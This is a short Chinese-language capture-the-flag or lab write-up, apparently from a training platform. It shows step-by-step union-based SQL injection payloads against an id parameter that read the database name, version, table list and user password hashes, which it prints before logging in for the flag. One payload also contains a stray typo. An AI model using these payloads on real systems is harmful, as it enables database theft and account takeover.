IP地址 : 124.70.22.208 端口 : 44703 协议 : http 其他 : [点击访问]
点击登录界面下的移动条幅
第一步,判断是否存在sql注入漏洞
构造 ?id=1 and 1=1 ,回车
正常显示
构造 ?id=1 and 1=2 ,回车
异常显示,初步判断这里可能存在一个注入漏洞。
第二步:判断字段数
构造 ?id=1 and 1=1 order by 1 回车 , 在by 后 依次 输 1,2,3,4,5,
当到 ?id=1 and 1=1 order by 5 回车时显示异常,判断字段数为 4
第三步:判断回显点
构造 ?id=1 and 1=4 union select 1,2,3,4 回车
页面出现了 2 ,3 ,说明我们可以在数字 2,3 处显示我们想要的内容
第四步:查询相关内容
查询当前数据库名、版本名
构造 ?id=1 and 1=4 union select 1,database(),version(),4 回车
数据库的名:mozhe_Discuz_StormGroup
版本号:5.7.22-0ubuntu0.16.04.1
查询数据库mozhe_discuz_stormgroup中的表
语句:id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()
获取到StormGroup_member,notice 这两张表。
接着去爆字段值
语句:id=-1/**/union/**/select/**/1,2,group_concat(name,id,password),4/**/from/**/StormGroup—_member
获得两条记录,密码是被md5加密,账号是mozhe,
mozhe1356f589a7df439f6f744ff19bb8092c0
mozhe18d30ea5ff534319652f548256aeb67b2
尝试去登录,发现第一个号被禁用了
接着去登录第二个,成功登录进去,获取到flag.
